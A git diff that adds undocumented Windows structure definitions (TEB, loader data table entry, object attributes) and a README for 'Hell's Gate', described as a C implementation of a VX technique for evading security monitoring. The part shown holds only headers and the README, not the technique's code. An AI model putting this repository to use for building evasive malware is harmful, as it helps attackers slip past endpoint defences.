+ {
+ USHORT SpareCrossTebFlags : 16;
+ };
+ USHORT CrossTebFlags;
+ };
+ union
+ {
+ struct
+ {
+ USHORT DbgSafeThunkCall : 1;
+ USHORT DbgInDebugPrint : 1;
+ USHORT DbgHasFiberData : 1;
+ USHORT DbgSkipThreadAttach : 1;
+ USHORT DbgWerInShipAssertCode : 1;
+ USHORT DbgIssuedInitialBp : 1;
+ USHORT DbgClonedThread : 1;
+ USHORT SpareSameTebBits : 9;
+ };
+ USHORT SameTebFlags;
+ };
+ PVOID TxnScopeEntercallback;
+ PVOID TxnScopeExitCAllback;
+ PVOID TxnScopeContext;
+ ULONG LockCount;
+ ULONG ProcessRundown;
+ ULONG64 LastSwitchTime;
+ ULONG64 TotalSwitchOutTime;
+ LARGE_INTEGER WaitReasonBitMap;
+#else
+ BOOLEAN SafeThunkCall;
+ BOOLEAN BooleanSpare[3];
+#endif
+} TEB, * PTEB;
+
+typedef struct _LDR_DATA_TABLE_ENTRY {
+ LIST_ENTRY InLoadOrderLinks;
+ LIST_ENTRY InMemoryOrderLinks;
+ LIST_ENTRY InInitializationOrderLinks;
+ PVOID DllBase;
+ PVOID EntryPoint;
+ ULONG SizeOfImage;
+ UNICODE_STRING FullDllName;
+ UNICODE_STRING BaseDllName;
+ ULONG Flags;
+ WORD LoadCount;
+ WORD TlsIndex;
+ union {
+ LIST_ENTRY HashLinks;
+ struct {
+ PVOID SectionPointer;
+ ULONG CheckSum;
+ };
+ };
+ union {
+ ULONG TimeDateStamp;
+ PVOID LoadedImports;
+ };
+ PACTIVATION_CONTEXT EntryPointActivationContext;
+ PVOID PatchInformation;
+ LIST_ENTRY ForwarderLinks;
+ LIST_ENTRY ServiceTagLinks;
+ LIST_ENTRY StaticLinks;
+} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
+
+typedef struct _OBJECT_ATTRIBUTES {
+ ULONG Length;
+ PVOID RootDirectory;
+ PUNICODE_STRING ObjectName;
+ ULONG Attributes;
+ PVOID SecurityDescriptor;
+ PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
+
+typedef struct _INITIAL_TEB {
+ PVOID StackBase;
+ PVOID StackLimit;
+ PVOID StackCommit;
+ PVOID StackCommitMax;
+ PVOID StackReserved;
+} INITIAL_TEB, * PINITIAL_TEB;
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..b71f1a5
--- /dev/null
+++ b/README.md
@@ -0,0 +1,12 @@
+## Hell's Gate ##
+
+Original C Implementation of the Hell's Gate VX Technique
+
+
+Link to the paper: https://vxug.fakedoma.in/papers/hells-gate.pdf
+
PDF also included in this repository
+
+
+Authors:
+* Paul Laîné (@am0nsec)
+* smelly__vx (@RtlMateusz)
\ No newline at end of file
diff --git a/hells-gate.pdf b/hells-gate.pdf
new file mode 100644
index 0000000..5cfa4e0
Binary files /dev/null and b/hells-gate.pdf differ